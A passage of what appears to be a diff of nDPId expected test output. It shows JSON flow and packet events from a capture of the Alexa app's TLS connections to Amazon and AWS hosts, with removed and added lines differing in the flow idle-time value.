-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1490976041995,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976041995,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0BJhAAEAGWRasECrYNFXR2NSLAbvD9komsM9I8YAQAVdfcwAAAQEICgD2Trdtm51v"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976042054,"flow_last_seen":1490976042054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976042054,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1490976042054,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042054,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AfNAAEAGW7OsECrYNFXR2NSNAbumNE9OAAAAAKAC\/\/9PagAAAgQFtAQCCAoA9k69AAAAAAEDAwg="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1490976042056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042056,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iw+cfkHGE+VGqAScSB8QwAAAgQFtAQCCAps\/wWhAPZOtAEDAwg="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1490976042057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042057,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0265AAEAGgf+sECrYNFXR2NSMAbsYT5UaPnH5CIAQAVca0QAAAQEICgD2Tr1s\/wWh"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1490976042099,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042099,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71I2zekUSpjRPT6AScSDSoAAAAgQFtAQCCAptF6XzAPZOvQEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1490976042101,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042101,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0AfRAAEAGW7qsECrYNFXR2NSNAbumNE9Ps3pFE4AQAVdxMgAAAQEICgD2TsJtF6Xz"} -00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":284,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041961,"flow_last_seen":1490976042150,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976042150,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":317,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1914,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976041870,"flow_last_seen":1490976042302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4834,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1490976042302,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1490976042419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G69AAEAGvmqsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/VegAAAgQFtAQCCAoA9k7iAAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1490976043609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976043609,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzNAAEAGfuasECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9jeAAAAgQFtAQCCAoA9k78AAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041942,"flow_last_seen":1490976041942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1490976041942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BJdAAEAGWQ+sECrYNFXR2NSLAbvD9kolAAAAAKAC\/\/823gAAAgQFtAQCCAoA9k6yAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1490976041952,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041952,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwusBAAOcGsnU27xi6rBAq2AG7hOPN4I6FxM0uknASH\/5nFQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1490976041953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041953,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYDtAAEAGtAOsECrYNu8YuoTjAbvEzS6SzeCOhlAQAVexhgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041961,"flow_last_seen":1490976041961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041961,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1490976041961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041961,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8261AAEAGgfisECrYNFXR2NSMAbsYT5UZAAAAAKAC\/\/+XjgAAAgQFtAQCCAoA9k60AAAAAAEDAwg="} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1490976041989,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041989,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iuwz0jww\/ZKJqAScSDA4QAAAgQFtAQCCAptm51vAPZOsgEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1490976041995,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976041995,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0BJhAAEAGWRasECrYNFXR2NSLAbvD9komsM9I8YAQAVdfcwAAAQEICgD2Trdtm51v"} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976042054,"flow_last_seen":1490976042054,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976042054,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1490976042054,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042054,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AfNAAEAGW7OsECrYNFXR2NSNAbumNE9OAAAAAKAC\/\/9PagAAAgQFtAQCCAoA9k69AAAAAAEDAwg="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1490976042056,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042056,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iw+cfkHGE+VGqAScSB8QwAAAgQFtAQCCAps\/wWhAPZOtAEDAwg="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1490976042057,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042057,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0265AAEAGgf+sECrYNFXR2NSMAbsYT5UaPnH5CIAQAVca0QAAAQEICgD2Tr1s\/wWh"} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1490976042099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042099,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71I2zekUSpjRPT6AScSDSoAAAAgQFtAQCCAptF6XzAPZOvQEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1490976042101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042101,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0AfRAAEAGW7qsECrYNFXR2NSNAbumNE9Ps3pFE4AQAVdxMgAAAQEICgD2TsJtF6Xz"} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":282,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976041961,"flow_last_seen":1490976042149,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976042149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 